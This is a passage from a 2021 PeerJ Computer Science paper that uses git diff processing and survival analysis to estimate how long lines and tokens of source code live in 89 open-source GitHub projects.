into account vacation time. We examined activity at weekly granularity, because some open source developers may only work over weekends. Popularity We selected projects having at least 100 GitHub “stars”. Results from popular projects are likely to be relevant to more people than those from obscure ones. Studying code aging in small test projects or student exercises is less likely to yield results of industrial relevance. Programming language To study source code evolution at the level of individual tokens as well as lines, we only selected projects whose main programing language, as reported in GHTorrent (Gousios & Spinellis, 2012), is supported by the tokenizer we used (Spinellis, 2019). These languages were selected based on their popularity among the projects selected using 1 Data: https://doi.org/10.5281/zenodo. 4319986 (3.5 GB compressed, 69 GB uncompressed); source code: https://doi. org/10.5281/zenodo.4319993. Spinellis et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.372 4/33 https://doi.org/10.5281/zenodo.4319986 https://doi.org/10.5281/zenodo.4319986 https://doi.org/10.5281/zenodo.4319993 https://doi.org/10.5281/zenodo.4319993 http://dx.doi.org/10.7717/peerj-cs.372 https://peerj.com/computer-science/ the other criteria, and cover 76% of the repositories initially selected. The languages processed are C, C#, Java, PHP, and Python. We performed the project selection through analytical processing of the GHTorrent data set (January 2018 version) based on the process described by Gousios & Spinellis (2017). The code information was obtained by downloading and processing each selected revision of the corresponding repository. Other than the stated selection criteria, we did not perform any other manual adjustments to add popular projects or exclude obscure ones. We ensured that our data set did not include duplicated projects by pairing it with a dataset for GitHub repository deduplication (Spinellis, Kotti & Mockus, 2020). From the one duplicate and two triplicate sets we thus found we retained the repositories with the longer commit history. Specifically, we chose github.com/droolsjbpm/drools over kiegroup/drools and droolsjbpm/guvnor, lede-project/source over openwrt-mirror/ openwrt and openwrt/packages, and doctrine/doctrine2 over doctrine/dbal. In total we analyzed 89 projects, comprising at the end of the studied period 372 thousands of source code files, 83 millions of source code lines, 404 millions of source code tokens, and 2.2 millions of examined commits. In terms of source code lines, we analyzed 497 million code line lifetime events: the appearance of 290 and the demise of 207 millions of source code lines. In terms of individual source code tokens, we analyzed 2.2 billion code token lifetime events: the appearance of 1,290 and the demise of 886 millions of source code tokens. Key metrics of the projects we analyzed are listed in Table 1. History simplification Software development with distributed version control repositories is characterized by the frequent generation of feature development branches and their subsequent merging into a more mainstream trunk (German, Adams & Hassan, 2016). For example, the repositories we analyzed contained a total of 243 thousand merges, or about three Table 1 Descriptive statistics of the analyzed repositories and aggregate totals. Metric Min Max Median Mean σ Total All files 384 110,737 2,786 7,986 17,522 710,798 Analyzed Source Code Files 165 73,655 1,291 4,175 11,177 371,566 Analyzed source code lines (thousands) 3 15,699 298 935 2,083 83,204 Analyzed source code tokens (thousands) 0 72,480 1,423 4,537 9,793 403,804 Committers 29 2,211 247 397 407 35,374 GHTorrent project duration (Years) 11 29 12 14 4 Analyzed branch duration (Years) 6 41 13 15 5 All commits (thousands) 6 299 19 39 51 3,508 Analyzed commits (thousands) 0 192 11 24 36 2,150 Line deaths (thousands) 1 28,680 827 2,326 4,482 207,022 Token deaths (thousands) 0 157,530 3,266 9,954 21,516 885,935 Project stars 117 34,193 878 2,207 4,289 Commit density (weekly %) 85 100 93 93 5 Spinellis et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.372 5/33 http://github.com/droolsjbpm/drools https://github.com/kiegroup/drools https://github.com/droolsjbpm/guvnor http://github.com/lede-project/source http://github.com/openwrt-mirror/openwrt http://github.com/openwrt-mirror/openwrt http://github.com/openwrt/packages http://github.com/doctrine/doctrine2 http://github.com/doctrine/dbal http://dx.doi.org/10.7717/peerj-cs.372 https://peerj.com/computer-science/ thousand per project. As we detail below, merges confuse and complicate the processing of history and therefore required devising a scheme to deal with them. The confusion arises from the fact that a topological ordering implied by the directed acyclic graph structure of a project’s commit history will lose code changes or their time ordering. (A topological ordering of a directed graph is a linear ordering of its vertices such that for every directed edge ab from vertex a to vertex b, the linear ordering has a appear before b.) Applying the typically-used three-way merge algorithm will result in the loss of code modifications, because the common ancestor will no longer be correctly represented. The complexity of merges has to do with how changes listed at the point of a merge can be automatically processed to obtain the code after it. In experiments we performed with diverse Git output options we found that the output of git log and also git format-patch was not a reliable way to reconstruct the state of a project from its history (Spinellis, 2016a). Consequently, the output could also not be used to track the lifetime of individual lines. Although we did not look for the root cause of these problems in depth, we only encountered them when working with merges, which leads us to believe that they were indeed caused by merges. Using Git’s combined diff format for merges is also unlikely to help, because, according to Git’s git diff documentation “Combined diff format was created for review of merge commit changes, and was not meant for apply”. And if dealing with binary merges was not bad enough, handling n-way merges, such as those handled by Git’s octopus-merge algorithm, added even more complexity to the problem. Consequently, we decided to simplify the commit history into a linear ordering by removing the least essential branches and merges. The rationale behind this decision is that each merge point captures changes that have happened on both branches; if the time difference from the branch to the subsequent merge is not too large, then the represented lifetime of the affected lines does not change substantially. (See analysis in the “Threats to Validity” Section.) An additional advantage of this approach is that it presents a commit sequence that is both topologically and temporarily ordered. To obtain this linear ordering, we took the topological ordering of the project’s commit graph and obtained the longest path in it. For directed acyclic graphs this path can be calculated in linear time, by having each vertex record its length as the maximum length of its parent neighbors plus one. Then the longest path can be obtained by traversing the graph along the vertices with the maximum recorded values. Figure 1 illustrates an example of a commit graph and its longest path. The simplification of history resulted in the reduction of examined commits from 3.106 million to 2.256 million, meaning that we processed about 73% of all commits. Lifetime tracking One could in theory obtain an indication regarding the lifetime of individual lines by sampling the output of the Git’s blame command at various time points. However, this process is computationally intensive and will only provide an approximation. To address these issues we designed an online algorithm and a corresponding open source tool Spinellis et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.372 6/33 http://dx.doi.org/10.7717/peerj-cs.372 https://peerj.com/computer-science/ (named lifetime) that continuously tracks the lifetime of code lines across successive commits. Tracking the lifetime of individual code lines across code commits is not trivial. An earlier study that demonstrated the estimation of code decay in the Unix operating system source code over the period 1975–2015, employed the git blame command to record the age of lines at the point of each one of 71 releases (Spinellis, 2016b). Changes over the sampled releases in the cardinality of sets representing lines born at a specific point of time were then used to estimate the lifetime of the corresponding lines. However, this method is quite inaccurate, since the lifetime estimates are bound between the dates of two successive releases. Furthermore, it is also computationally expensive. The specific task required (on a massively parallel supercomputer) 9.9 core years CPU time, 3,815 cores, 7.6 TB RAM, and 588 GB of disk space. In fact, our case of 711 k files × 3.5 M commits would require two orders of magnitude more resources. In common with most version control systems, Git can output the differences in a file between two commits as a series of line additions and removals. (Changes are represented as an addition and removal.) By default, this operation uses the popular Myers algorithm (Myers, 1986) to minimize the presented differences. In common with the work by Zimmermann et al. (2006), we processed the output of Unix (Git) diff, rather than alternatives such as LHDiff (Asaduzzaman et al., 2013a), because diff operates fast and its output is machine-readable. A line may appear in the output of a commit’s differences for several reasons: (1) actual deletion—within a retained file or through a file’s deletion, (2) changes in identifier names, (3) other non-whitespace changes, (4) movement to another part of the same file, (5) movement to another file, (6) change of indentation, or (7) other cosmetic— whitespace—changes. Reasons 1 and 3 are definitely signs of the line’s death that are relevant to this study: a (most-probably) functional modification. Our methods also consider as a line death reasons 2 and 4, because it is difficult to identify such changes with the tools we employed. We deal with these potential shortcomings by expanding our methods to track changes of individual tokens and by measuring the effect of line moves. We were also able to continue tracking through their lifetime lines that change due to reasons 5–7. First, we set git diff to ignore all changes in a line’s whitespace. This filtered out noise introduced by indentation adjustments induced through other changes as well as Figure 1 Branch graph path length attributes and the longest path. Full-size DOI: 10.7717/peerj-cs.372/fig-1 Spinellis et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.372 7/33 http://dx.doi.org/10.7717/peerj-cs.372/fig-1 http://dx.doi.org/10.7717/peerj-cs.372 https://peerj.com/computer-science/ changes in a file’s tab (hard vs soft tabs) or end-of-line (the use of line feed and carriage return) representation. Second, we configured git diff to detect file renaming and copying, in order to follow cross-file code movements. An example of the git diff output format processed by the lifetime tool we built appears in Listing 1. Line 1 is a custom commit header we employed, containing the commit’s SHA identifier and its timestamp. The commit involves changes to two files; lines 3 and 13 show the old and new names of the files being compared. When a file is removed or newly added the new file name (in the case of removals) or old file name (for additions) is /dev/null (the Unix empty file). Lines 4–6 and 15–17 contain metadata that is not important for the task at hand. Lines 7–9 show the addition of two lines at the new file range +3,2 listed in the @@ line. Lines 18–19 do the same for the second (newly-created) file. Lines 10–12 show a line’s change: line 5 of the old version’s file is replaced by line 7 in the new version’s file. in the new file version. A series of extended headers can appear after the diff line to indicate file deletions, renames, and copies, which Git detects by applying heuristics in the compressed repository state snapshot stored for each commit. The lifetime program2 works by processing a series of git diff outputs (such as those detailed in the preceding paragraph) using the state machine depicted in Fig. 2. State transitions take place when input lines match the regular expressions shown in the diagram. Listing 1 Example of git diff output. 1 commit dfdcb9a67686[…]de95524b845d 1470512904 2 3 diff −−git a/main.c b/main.c 4 index 63161da..7a6f21d 100644 5 −−− a/main.c 6 +++ b/main.c 7 @@ −2,0 +3,2 @@ 8 +#include “message.h” 9 + 10 @@ −5 +7 @@ main(int argc, char *argv[]) 11 − printf (“hello, world”); 12 + printf (MESSAGE); 13 diff −−git a/message.h b/message.h 14 new file mode 100644 15 index 0000000..be10a6e 16 −−−/dev/null 17 +++ b/message.h 18 @@ −0,0 +1 @@ 19 +#define MESSAGE “hello, world” 2 Available in this study’s source code package at https://doi.org/10.5281/ zenodo.4319993 and also on GitHub https://github.com/dspinellis/code- lifetime. Spinellis et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.372 8/33 https://doi.org/10.5281/zenodo.4319993 https://doi.org/10.5281/zenodo.4319993 https://github.com/dspinellis/code-lifetime https://github.com/dspinellis/code-lifetime http://dx.doi.org/10.7717/peerj-cs.372 https://peerj.com/computer-science/ The operations can be expressed through the following notation. � The timestamp Tc associated with commit currently being processed. � A partial function T : ðF; LÞ ! TB mapping each integer-numbered line L of file F onto its birth time TB. � Another partial function B : F ! v, that yields true when a file F contains binary data (e.g., an image). � The last line of each file FE ¼ max l : T F; lð Þ 6¼ ?f gð Þ. The rules applied when processing the git diff data are the following. 1. For each code line numbered L added to file F that the program encounters (e.g., lines 8, 9, 12, 19 in Listing 1), it remaps existing timestamps from L until the end of the file E in the map T it maintains to make space for the new line, and it inserts an entry in the timestamp map with the current timestamp Tc (1470512904 in line 1 of Listing 1). 8l 2 ðL::FEÞ; T0ðF; l þ 1Þ ¼ TðF; lÞ T0ðF; LÞ ¼ Tc 2. For each code line numbered L deleted from file F that the program encounters (e.g., line 11 in Listing 1), it outputs a tuple with the line’s birth time and the time of its demise, Figure 2 State machine for git diff output processing. Full-size DOI: 10.7717/peerj-cs.372/fig-2 Spinellis et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.372 9/33 http://dx.doi.org/10.7717/peerj-cs.372/fig-2 http://dx.doi.org/10.7717/peerj-cs.372 https://peerj.com/computer-science/ ðTðF; LÞ; TcÞ and it remaps the timestamps of the lines from L until the end of the file E to close-up the gap of the deleted line. 8l 2 ðL::FE � 1Þ; T0ðF; lÞ ¼ TðF; l þ 1Þ T0ðF; FEÞ ¼ ? 3. When changes to a binary file F are encountered, this file is marked as binary in a map B, and no further output is ever performed on operations on that file. This is needed because changes to binary files are not identified in terms of lines, so further changes when a file reverts to text format will not have correct timestamps to refer to. BðFÞ ¼ true 4. When a file Fa is identified as copied to file Fb, new map entries are established with the original line birth dates and the binary file status is also transferred to the new file. 8l 2 1:: max FaE; FbEð Þð Þ; TðFb; lÞ ¼ TðFa; lÞ BðFbÞ ¼ BðFaÞ 5. When a file Fa is identified as renamed to file Fb, new map entries are created as above, and the existing ones are removed. 6. After processing all commits, lifetime outputs tuples with the birth timestamps of all lines that are still alive and the word alive. TðF; LÞ; aliveð Þ : TðF; LÞ 6¼ ?f g The processing is complicated by the fact that all change references to the existing state of a commit, refer to the state before any change has been applied to any of the files; changes are not supposed to be applied while processing a commit. For example, if a commit renames file Fa to Fb and Fb to Fa the names of the two files will be correctly swapped. Also, changes to a file that has been copied or renamed in the same commit refer to the name of the file before the corresponding operation. This complication is addressed by recording all changes in a queue as instructions to add or remove elements from the timestamp map T. When all elements of a commit have been processed, a routine replays the recorded changes on the current state to generate the new one. Considerable effort was invested in making the lifetime program easy to test and troubleshoot. This was needed for three reasons. First, the output of git-diff seems to be only informally defined and involves many special cases. Second, tracking line timestamps by hand to verify the program’s operation is a complex and error-prone process. Third, errors were encountered in the middle of processing data hundreds of gigabytes in size; isolating these errors proved to be a challenging task. In order to help testing and troubleshooting the lifetime program supports eight command-line options that configure it to output diverse data regarding the processing it performs. A separate option can be used to terminate the processing at a specific commit, thus allowing the examination of the data at the given time point. The most important of Spinellis et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.372 10/33 http://dx.doi.org/10.7717/peerj-cs.372 https://peerj.com/computer-science/ the debug options, modifies the program’s operation to store in the map T the complete content of each added line, rather than the current timestamp Tc. Then, when a line is removed, it is compared with the map’s content to verify that the two match. Any differences signify a failure in the process to record the changes. Such differences allowed us to find that the output of git log and git format-patch were not trustworthy enough for our purposes. Furthermore, the same debug option uses the map’s contents to reconstruct a copy of the project’s file tree, when all its commits have been processed. Comparing the file tree against a checked-out version of the project allows the end-to-end verification of the program’s operation. The lifetime program is accompanied by two Git repositories containing tens of diverse commit cases. A test script is used to compare the reconstructed state against the original one at the end of each commit. Analysis of individual tokens Although lines of code are often used to measure software and its evolution, tracking changes at the level of lines can threaten the results’ validity. Specifically, small changes, such as renaming an identifier, will appear to change many lines. In addition, a line may appear to change through edits unrelated to it, such as the addition of a brace when a statement is added below it. Consequently, it would be valuable to track evolution at the level of individual tokens rather than lines. We designed and implemented a process and tools to track the birth and demise of individual tokens based on an idea by German, Adams & Stewart (2019). This involves creating a synthetic Git repository where files are stored as one token per line. The setup can be traced to the more general concept of using a synthetic Git repository to track arbitrary fine-grained elements (Hata, Mizuno & Kikuno, 2011). The downloaded repositories amount to 30 GB and the synthetic ones to 32 GB. Tracking changes between revisions in such a repository will show the addition and removal of individual tokens, rather than complete lines. All other workflow and tools can remain the same. We created tokenized versions of the selected repositories through two tools: a file tokenizer and a repository tokenizer. The repository tokenizer is a Perl script that acts as a filter between a git fast-export and a git fast-import command. It reads the dump of the original repository generated by the git fast-export command, queueing file content blobs it encounters, while passing the remaining data unchanged to its output. When it reads a commit packet, it matches the file extensions of the committed files against previously encountered blobs. For any blob whose file extension matches the languages supported by the file tokenizer, the repository tokenizer invokes the file tokenizer to convert the file into tokens, dumping the tokenized results on its output as the corresponding blob. To tokenize the contents of each file, we used the tokenizer tool, which splits its input into tokens using simple look-ahead lexical analysis (Spinellis, 2019). Support for each language is provided through a separate lexical analyzer to cater for differences in operators, reserved words, commenting, and string delimiters. Through command-line options we directed the file tokenizer to split its input into a token per line replacing the Spinellis et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.372 11/33 http://dx.doi.org/10.7717/peerj-cs.372 https://peerj.com/computer-science/ content of strings and comments with an ellipsis (…), thus also allowing us to ignore non-code changes. Analysis of moved lines Given that the file differencing program we employed will not report line moves within the same file, we attempted to quantify the effect of this behavior on our results. For this, we developed a tool that uses Heckel’s linear time differencing algorithm (Heckel, 1978), which does attempt to locate line moves. Although the output of this program is not suitable for running the fully fledged analysis, its summary of added and removed lines can be tallied against that of the git diff program to compare their performance in detecting lines that have not changed. By configuring git diff to run the alternative program between all successive revisions, we found that Heckel’s algorithm, despite taking into account line moves, reports 2.2% more line additions and deletions than Git’s stock algorithm. While differencing algorithms can always be tweaked to handle elaborate special cases, this result indicates that the differencing program we employed for the study works pretty hard to identify a competitively small set of differences, and that taking into account line moves using Heckel’s algorithm would reduce the accuracy of our results by failing to track about 2% more lines. Effect of the histogram algorithm Following the recommendation of a recent systematic survey of studies that use diff (Nugroho, Hata & Matsumoto, 2020), we also examined whether the use of Git’s Histogram difference algorithm would substantially alter our results. Using a process similar to that described in the “Analysis of Moved Lines”, we measured the differences in the reported added and deleted lines between the Myers and the Histogram algorithms. Both differences were below 0.5%: 0.28% for deletions and −0.45% for additions. The effect’s small size is not surprising, because the Histogram algorithm mainly improves the readability of the provided patch. Statistical analysis If we had the time of birth and the time of death for each line of code and token in a project we could estimate the median lifespan of the line or token directly, by calculating lifespans and finding their median value. We are interested in the median and not the mean, because lifetimes may be skewed, so the mean, or average, would not give a representative metric. Unfortunately, we do not have the lifespans of all lines and tokens that we have tracked in the repositories we have examined. We do have their birth timestamps, but there are many lines and tokens that are still alive at the end of our follow-up period: these are the lines and the tokens that are part of the code base of a project at the last time we check. Their lifespans are right censored; they extend to the future. Across projects, the mean of the percentage of right censored lines is 29.97% and the median is 28.25%; for tokens, the corresponding values are 33.38% and 30.87% respectively. Spinellis et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.372 12/33 http://dx.doi.org/10.7717/peerj-cs.372 https://peerj.com/computer-science/ To estimate the median lifespan under such circumstances we use the Kaplan–Meier or product-limit survival estimate (Kaplan & Meier, 1958). If our measurements take place at times t1 < t2 < … < tn and at time ti we have ni that are alive, of which di die right at that moment, then the probability of being alive at time ti is given by: SðtiÞ ¼ Sðti�1Þ ni � di ni � � The recursive definition assumes t0 < t1 and S(t0) = 1. In our data, lines and tokens are born at different times during a project. Since we are interested in their lifespans and not at the chronological times of birth and death, we work only with the differences between birth and death timestamps. That means that the times ti are time offsets; time 0 is the birth time for all lines. For example, if we have a line with a lifespan from ti to tj we take for its death time the difference tj − ti. For the lines and the tokens that are right censored, we assign as their death timestamp the latest timestamp in the project. We also flag them as being alive, which means that in the Kaplan–Meier estimation their lifespan will be taken to be at least until the latest project timestamp. Note that we do not have censoring due to other causes, for example, a line being “lost” somewhere in the project’s timeline, without being able to follow it up. The function S(t) is stepwise, with constant values between the different ti. It estimates the survival function of a data set, which is formally defined as follows: S(t) is the probability that an individual (line of code in our case) survives longer than a time t: SðtÞ ¼ PðT > tÞ In the above, T is a variable indicating the time of death. We would also like to know what is the risk of dying at t. For this, we have to turn to the hazard function, or hazard rate, h(t), which is the rate at which an individual that has made it to time t will die within an interval δ t that tends to zero: hðtÞ ¼ lim Dt!0 Pðt � T < DtjT � tÞ Dt We have three alternative hypotheses regarding the hazard function: � Individuals run the same, constant, risk of death at each time t. � Individuals run a higher risk of death when they are young; these are populations whose demographics are characterized by high infant mortality. � Individuals run a higher risk of death when they are old; these are populations whose frailty increases with age (senescence). To test these hypotheses we will check whether the hazard function for lines of code follows a Weibull distribution, a standard parametric model in survival analysis that has Spinellis et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.372 13/33 http://dx.doi.org/10.7717/peerj-cs.372 https://peerj.com/computer-science/ been used widely in science and engineering (Padgett, 2011). The Weibull distribution specifies the following hazard rate, with two parameters l > 0, a > 0 hðt; �; aÞ ¼ a�ta�1 The corresponding survival function is: Sðt; �; aÞ ¼ e��ta The parameter a is called the shape parameter and the parameter l is called the scale parameter. Together they determine the form of the corresponding Weibull probability density function f ðt; �; aÞ ¼ a�ta�1e��ta. The parameter l stretches or contracts the distribution along the x axis. There are three different cases for the parameter a: � If a < 1, the hazard rate decreases over time. � If a = 1, the hazard rate is constant. � If a > 1, the hazard rate increases with time. The three alternatives for α mirror the three hypotheses we want to check and can be the basis of the statistical analysis of the code aging process. RESULTS AND DISCUSSION RQ1 The Kaplan–Meier estimate provided the median lifespan for the projects we examined. This is the point in time at which 50% of the population has died. Figure 3 shows the Kaplan–Meier survival functions for all projects, in increasing order. The minimum line median lifespan, at 0.000105 years (about 0.9 h), is for the project HandBrake; the maximum line median lifespan, at 10.03 years, is for collectd, while for torque and boto the lifespan could not be calculated, because not enough lines had died by Figure 3 Kaplan–Meier median lifespan estimates. Lifespan estimates per project, in increasing order, calculated for lines and for individual tokens. Full-size DOI: 10.7717/peerj-cs.372/fig-3 Spinellis et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.372 14/33 http://dx.doi.org/10.7717/peerj-cs.372/fig-3 http://dx.doi.org/10.7717/peerj-cs.372 https://peerj.com/computer-science/ the end of the data collection period to be able to get to the 50% point. We investigated the extremely low value for HandBrake. It appears that the project features large commits and incorporates the entire Mac Sparkle framework within the repository. Turning to tokens, the minimum median lifespan was for odoo at 0.02 years. There were four projects for which no median lifespan could be calculated: thrift, mpc-hc, boto, collectd, torque. The maximum median lifespan that could be calculated was for docuwiki, at 12.33 years. Taking all line results together, the median of the median lifespans is at 2.37 years, while the 25% percentile is at 1.54 years and the 75% percentile is at 4.25 years. For tokens, the corresponding median is 2.93 years, the 25% percentile 1.67 years, and the 75% percentile 5.36 years. These results indicate that lines and their individual tokens are durable rather than perishable, with lifespans measured in years rather than days. Figure 4 shows the histograms of the median lifespans. The growth of projects is punctuated with bursts of additions and deletes; these occur when a large body of code is imported or removed en masse from the project. We examined whether the estimates would change if we remove outliers. We therefore carried out the same statistics after removing the lines and tokens that where introduced in commits that were in the top 1% of commit size in every project. The line median lifespan moved to 2.54 years, an increase of 7.17%; the token median lifespan moved to 3.18 years, an increase of 8.53%. That is not trivial, but it does not change the overall picture. To determine whether the differences in the medians between the line-oriented and the tokenized data can be explained away by chance, we carried out a Wilcoxon signed- rank test. The null hypothesis was that the two median populations come from the same distribution. The test allowed us to reject the null hypothesis with high probability (p-value close to zero). It follows that code tokens lead longer lives than code lines; Figure 4 Histogram of median lifespans. Distributions of median lifespans of lines and individual tokens. Full-size DOI: 10.7717/peerj-cs.372/fig-4 Spinellis et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.372 15/33 http://dx.doi.org/10.7717/peerj-cs.372/fig-4 http://dx.doi.org/10.7717/peerj-cs.372 https://peerj.com/computer-science/ after all, every token that changes affects the line in which it belongs, but the opposite does not hold. As project lifespans vary, the variability of code lifespans may be explained by the variability of project lifespans: code in longer-lived projects may live longer than code in younger projects. To investigate that, we performed correlation tests between median line lifespans and project lifespans. The Spearman correlation test for lines produced ρ = 0.29 (p < 0.01), which indicates a slight monotonically increasing relationship between median life lifespan and project lifespan. The Pearson correlation test produced r = 0.39 (p ≪ 0.01); the difference with the Spearman result can be explained if the relationship is monotonically increasing, but not linear. For tokenized data, the correlation was a bit stronger, with Spearman ρ = 0.37 (p ≪ 0.01) and Pearson r = 0.44 (p ≪ 0.01). Figure 5 shows a scatterplot of line and tokens median lifespans with a regression line; the regression coefficient for lines is 0.23 and for tokens is 0.28. In all, although the effect of project age is statistically significant, its effect on the longevity of code is small. RQ2 Moving beyond the estimates of median line lifespan, we checked the three hypotheses on hazard rates by fitting a Weibull distribution to each project’s data. The fit was performed on the full line data of each project; we are interested in the fitted Weibull a parameter that controls the shape of the distribution and therefore the evolution of the hazard rate. The results of the fit showed that for all projects the a parameter is less than one, indicating a process with high infant mortality. Figure 6 shows the Weibull fitted distributions for all projects, each line being a project. The median of a is 0.52, while the 25% percentile is 0.43 and the 75% percentile 0.63. The situation is almost the same if we do the same analysis for tokens. Two projects have a � 1 (by a whisker, ojs with a = 1.01 and xmbc with a = 1.07). The median is 0.53, the 25% percentile 0.43 and the 75% percentile 0.70. Project lifespan (years) lines M e d ia n li fe sp a n ( ye a rs ) Figure 5 Line median lifespan on project lifespan. Scatterplots and regression lines of the lifespan of each project vs the median lifespan. Full-size DOI: 10.7717/peerj-cs.372/fig-5 Spinellis et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.372 16/33 http://dx.doi.org/10.7717/peerj-cs.372/fig-5 http://dx.doi.org/10.7717/peerj-cs.372 https://peerj.com/computer-science/ From the above, it follows that young lines run higher risks. Old lines die as well, but younger ones at higher rates. This suggests a software development process where lines that are introduced into the code base of the project are subject to more change pressures. A line that has just been committed may not have been as thoroughly tested as older lines; it may need to be modified to accommodate factors that had not been foreseen; lines just added may impact more those recently introduced than parts of the older code base. Conversely, old lines seem to have proved their mettle. They have survived a long time and they are less likely to suffer changes than young lines. In a more negative light, old lines may gain a “don’t touch” status, where developers are wary to change anything that works, which therefore lives on. Whichever may hold, that a line lives on because it is really valuable or because nobody dares to change it, developers should be aware that they work for the long term. A line of code may live for years, well beyond the developers’ involvement with a project or their ability to remember the rationale behind a cryptic choice. Consequently, our findings provide one more reason for writing clear and well-documented code. Our findings also support the need to manage and perform what have been called anti-regressive changes (Lehman, 1978) to the software (effort required to combat the growth in complexity) in order to avoid the accumulation of technical debt (Kruchten, Nord & Ozkaya, 2012). Code lines that live long are likely to become out of sync with respect to the software’s evolving architecture, design, APIs, third-party libraries, language standards, as well as coding conventions and practices. As we have shown, such lines are not very likely to go away. Consequently, it is required to find those code lines that need care and bring them up to scratch. This is typically accomplished through the detection of code smells and the corresponding refactoring of code (Fowler, 2000). Figure 6 Hazard rates of lines of code per project. For all projects, the hazard rate for lines decreases with time, i.e., older lines run a smaller risk of dying. Full-size DOI: 10.7717/peerj-cs.372/fig-6 Spinellis et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.372 17/33 http://dx.doi.org/10.7717/peerj-cs.372/fig-6 http://dx.doi.org/10.7717/peerj-cs.372 https://peerj.com/computer-science/ RQ3a We investigated whether particular features of lines are conducive to more changes. We ran a linear multiple regression model for each project with the lifespan of a line as the dependent variable and as independent variables the length of the line, the indentation, the number of strings in the line, whether it (or part of it) is a comment, the number of commas, the number of brackets, the number of access operators (method and pointer), the number of assignments, the number of scope delimiters, the number of array accesses, and the number of logical operators. The elements we tested point to code smells or other code features that may make the code less stable, affecting its lifetime. We selected the aforementioned features for the following reasons. A large number of brackets may indicate complicated conditions or expressions, or long statements, which are a known code smell (Sharma, Fragkoulis & Spinellis, 2016). A large number of commas may indicate a long parameter list smell (Mäntylä & Lassenius, 2006). Strings may indicate the entanglement of presentation elements with business logic (Nguyen et al., 2012). The results showed a very low fit (R2 < 0.1) for all projects, apart from canu with R2 = 0.44, HandBrake, with R2 = 0.29, and pyparallel, with R2 = 0.11. The regression coefficients were found with very small p values, which indicates that the influence they have on the lifespan cannot be explained away by chance, but the whole linear model, and therefore each particular predictor in it, accounts for a tiny part of lifetime variance. RQ3b To conduct a similar analysis for tokens, we divided tokens in four types: identifiers (391 million), numbers (91 million), keywords (112 million), and other tokens (mainly operators and punctuation—723 million). We ran pairwise Mann–Whitney U tests between the lifetimes of different token types for each project. The distributions of the lifetimes of token types per project are different in the vast majority of projects (ranging from the distributions of 86/89 projects for identifiers vs other tokens to the distributions of 82/89 projects for keywords vs numbers). However, when we take the medians of the lifetimes of different token types for all projects, their distributions are then all indistinguishable. As for lines, we could not determine that some particular types of tokens are associated with longer lifetimes across projects. RQ3c A different factor that may influence the lifespan of a line is the committer who enters, alters, or deletes a line. We examined possible correlations between the lifespan and the number of developer commits in the project and between the experience and the tenure of the developer in the project. For this, we looked at commits in the middle year of the examined period (2012), thus providing at least 4.5 years time to gather line and developer data and then another 4.5 for lines to disappear. We used the number of a developer’s project commits until each examined commit as a measure of a developer’s experience, and the difference in time between the developer’s first project commit and the examined one as a measure of the developer’s tenure in the project. We carried out both Spearman and Pearson correlation tests to examine the relationship between line lifetime and the Spinellis et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.372 18/33 http://dx.doi.org/10.7717/peerj-cs.372 https://peerj.com/computer-science/ experience and tenure of the developer who added the line. We could not identify a single rule across projects. In some projects, committer activity and tenure appear to be positive correlated with line lifespan, in other projects they appear to be negative correlated, and in most projects the correlation seems to be weak: the median is close to zero. The situation changes when we examine the lifetime of lines vs the experience and tenure of the author who removed them: we find that the lifetime is positively correlated with developer experience, that is, more experienced developers remove longer-lived lines. The median of the correlation of line lifetime and developer experience across projects is 0.27 (Spearman) and 0.24 (Pearson) for p < 0.05; for the correlation of line lifetime and developer tenure the medians are 0.42 (Spearman) and 0.33 (Pearson) for p < 0.05. Alternatively, the above can mean that it takes experienced developers to remove a long-lived line, bringing us back to the “don’t touch” status. The “don’t touch” status also hints at a different facet of the way lines are handled. Could it be that lines are more likely to be changed or deleted by the same developer who entered them into a project in the first place, rather than by a different committer? We contrasted, for each project, the lifetimes of lines that are changed by the same developer against those that are changed by a different one. The two distributions are different (checking with the Mann–Whitney U test) for all projects except drush and grails-core. In most projects, the median lifetime of lines removed by the same author who entered them is less than the median lifetime of lines removed by a different author (81/89); and similarly for the means (85/89). In short, lines are more likely to be touched by their original author (see also Fig. 7). Figure 7 Per project lifetime medians for same and different committers. Full-size DOI: 10.7717/peerj-cs.372/fig-7 Spinellis et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.372 19/33 http://dx.doi.org/10.7717/peerj-cs.372/fig-7 http://dx.doi.org/10.7717/peerj-cs.372 https://peerj.com/computer-science/ RQ3d We investigated whether project size affects the longevity of lines and tokens. We checked the number of lines and the number of tokens for all commits, using both Pearson and Spearman correlations. We found only slight positive correlations, r = 0.35 (p < 0.01),for the Pearson correlation (but not the Spearman) for both the number of lines and the number of tokens in a project. Of course, the size of the project may be related to its age and indeed the results are concordant with our preceding investigation on code lifespans and project lifespans. RQ3e Turning to programing languages, although we expected to find greater lifespans in languages with features that promote modularity, we did not detect that. Table 2 shows that median lifetime estimates over projects grouped by programing language (excluding a single project in C#). If anything, we see that, for instance, C exhibits greater lifespans than C++. However, note that none of the differences between programing languages was statistically significant at the 0.01 level using the Mann–Whitney U test. THREATS TO VALIDITY Internal validity Thankfully, by basing our study on historical data, many threats that typically appear in evolving experiments, such as design contamination, experimental mortality, and maturation, can be ruled out. The main remaining threats are associated with confounding factors, noise in the data, commit granularity, file differencing, and statistical methods. An important consideration is that the independent variable we used in our study, a code line’s age, can encompass many other variables. Specifically with the passage of time, the number of faults in a line will decrease as these are winnowed out (Ozment & Schechter, 2006), the developers’ familiarity will increase as they read it again and again, and the line’s afferent couplings may increase as other code may depend on its elements. Another factor is noise in the data we used. Although we were careful to include (through simple measures) in our study what has been termed engineered software projects (Munaiah et al., 2017), we cannot exclude the possibility that the underlying commit data contain infelicities that may influence our results. These include the addition or removal of large third-party software systems, wrongly set commit dates, history 